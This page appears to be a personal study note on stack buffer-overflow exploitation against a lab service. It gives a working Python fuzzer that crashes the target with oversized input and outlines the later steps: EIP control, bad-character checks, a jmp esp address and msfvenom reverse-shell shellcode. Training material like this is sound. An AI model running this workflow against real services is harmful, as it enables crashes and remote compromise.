BoF Script Python

Not a right script, but you can learn from it

1-fuzzer.py

The main idea is send the "A" (string) as much as possible for crashing the service.

import socket, time, sys

ip = "10.10.12.54"
port = 1337
timeout = 5
prefix = "OVERFLOW5 "
string = prefix + "A" * 100
while True:
        try:
                with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                        s.settimeout(timeout)
                        s.connect((ip, port))
                        s.recv(1024)
                        print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                        s.send(bytes(string, "latin-1"))
                        s.recv(1024)
        except:
                print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
                sys.exit(0)
        string += "A" * 100
        time.sleep(1)

2-pattern.py

Need to change the payload with the number of pattern (get from fuzzer) + 200:

Use this website for generating pattern --> https://wiremask.eu/tools/buffer-overflow-pattern-generator/

3-checkEIP.py

Optional if you need to make sure that you able to control EIP with "BBBB"

4-sendBadChar.py

Change the payload with sorted hex, and checking which character are bad for the service while running. Generate badchar with this python script --> https://github.com/joshua17sc/Buffer-Overflows/blob/main/create.py

5-jmp_esp_module.py

change "BBBB" / EIP with module address (jmp_esp), so when EIP loaded, your process going to ESP (your payload)

6-revshell.py

Sending payload (shell code) to the server.

Generate shellcode with msfvenom

Create Bad Char

create.py

PreviousWinDbgNextActive Directory Recon

Last updated